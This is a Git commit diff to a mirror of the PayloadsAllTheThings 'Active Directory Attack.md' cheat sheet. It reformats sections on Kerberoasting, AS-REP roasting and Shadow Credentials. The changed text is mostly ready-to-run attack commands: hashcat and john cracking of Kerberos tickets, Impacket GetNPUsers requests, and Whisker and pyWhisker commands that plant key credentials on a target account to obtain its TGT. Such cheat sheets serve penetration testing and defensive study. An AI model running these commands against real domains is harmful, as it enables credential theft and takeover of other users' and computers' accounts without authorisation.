ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 03:16:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update Active Directory Attack.md

Browse Source
This commit is contained in:
p0dalirius 2021-10-06 08:59:13 +02:00
parent 19b4bee7a0
commit 8045496946
1 changed files with 26 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
Methodology and Resources/Active Directory Attack.md
View File

@ -1517,11 +1517,11 @@ Any valid domain user can request a kerberos ticket (TGS) for any domain service
Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
| Mode | Description | | Mode | Description |
|-------|--------------| |---------|--------------|
| 13100 | Kerberos 5 TGS-REP etype 23 (RC4) | | `13100` | Kerberos 5 TGS-REP etype 23 (RC4) |
| 19600 | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) | | `19600` | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) |
| 19700 | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) | | `19700` | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) |
```powershell ```powershell
./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt ./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt
@ -1559,7 +1559,7 @@ Mitigations:
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
``` ```
* `GetNPUsers` from Impacket Suite * [GetNPUsers](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) from Impacket Suite
```powershell ```powershell
$ python GetNPUsers.py htb.local/svc-alfresco -no-pass $ python GetNPUsers.py htb.local/svc-alfresco -no-pass
[*] Getting TGT for svc-alfresco [*] Getting TGT for svc-alfresco
@ -1594,24 +1594,31 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
### Shadow Credentials ### Shadow Credentials
Requirements : Requirements :
* Domain Controller on Windows Server 2016 * Domain Controller on (at least) Windows Server 2016
* PKINIT Kerberos authentication * PKINIT Kerberos authentication
* An account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object * An account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object
Add **Key Credentials** to the attribute **msDS-KeyCredentialLink** of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.
```powershell - From Windows, use [Whisker](https://github.com/eladshamir/Whisker):
# https://github.com/eladshamir/Whisker ```powershell
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
Whisker.exe list /target:computername$
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
# Removes a key credential from the target object specified by a DeviceID GUID.
Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b
```
Whisker.exe list /target:computername$ - From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker):
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. ```bash
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1 python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1"
Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b # Removes a key credential from the target object specified by a DeviceID GUID.
# Removes a key credential from the target object specified by a DeviceID GUID. python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
``` ```
### Pass-the-Hash ### Pass-the-Hash